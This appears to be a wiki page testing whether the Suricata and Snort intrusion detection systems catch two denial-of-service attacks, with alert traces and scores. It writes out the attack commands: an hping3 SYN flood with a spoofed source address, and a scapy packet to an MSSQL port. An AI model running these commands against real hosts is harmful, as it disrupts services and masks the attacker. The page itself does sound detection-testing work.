Synthesis

Test	Suricata	Snort
hping SYN flood	1	1
DoS against MSSQL	1	1
TOTAL	2	2

Hping SYN flood

Test: Hping SYN flood
Payload:

sudo hping3 -I wlan0 -a 192.168.2.10 -S 192.168.2.245 -p 22 --flood

Suricata trace

ET SCAN Potential SSH Scan (Classification: Attempted Information Leak)
ET SCAN Potential SSH Scan OUTBOUND (Classification: Attempted Information Leak)

Suricata score: 1
Snort trace:

ET SCAN Potential SSH Scan (Classification: Attempted Information Leak)
ET SCAN Potential SSH Scan OUTBOUND (Classification: Attempted Information Leak)

Snort score: 1

DoS against MSSQL

Test: DoS against MSSQL
Payload:

sr1(IP(dst="192.168.100.35")/TCP(dport=1433)/"0"*1000)

Suricata trace:

03/10/11-08:21:37.786533 [**] [1:2010935:2] ET POLICY Suspicious inbound to MSSQL port 1433 [**] [Classification: Potentially Bad Traffic] [Priority: 3] {6} 192.168.100.37:20 -> 192.168.100.35:1433 [Xref => http://doc.emergingthreats.net/2010935][Xref => http://www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/POLICY/POLICY_DB_Connections]
03/10/11-08:21:38.359795 [**] [1:2001583:14] ET SCAN Behavioral Unusual Port 1433 traffic, Potential Scan or Infection [**] [Classification: Misc activity] [Priority: 3] {6} 192.168.100.37:20 -> 192.168.100.35:1433 [Xref => http://doc.emergingthreats.net/2001583][Xref => http://www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/SCAN/SCAN_Netbios]

Suricata score: 1
Snort trace:

[**] [129:2:1] Data on SYN packet [**]
[Priority: 3] 
03/11-08:46:33.105534 192.168.100.37:20 -> 192.168.100.36:1433
TCP TTL:64 TOS:0x0 ID:1 IpLen:20 DgmLen:41
******S* Seq: 0x0  Ack: 0x0  Win: 0x2000  TcpLen: 20

Snort score: 1

Comments

Talk:Suricata-vs-snort/Test-cases/Denial-of-service

Suricata-vs-snort/Test-cases/Denial-of-service

Synthesis

Hping SYN flood

DoS against MSSQL

Comments

Share your opinion

Navigation menu

Suricata-vs-snort/Test-cases/Denial-of-service

Synthesis

Hping SYN flood

DoS against MSSQL

Comments

Share your opinion

Navigation menu

Search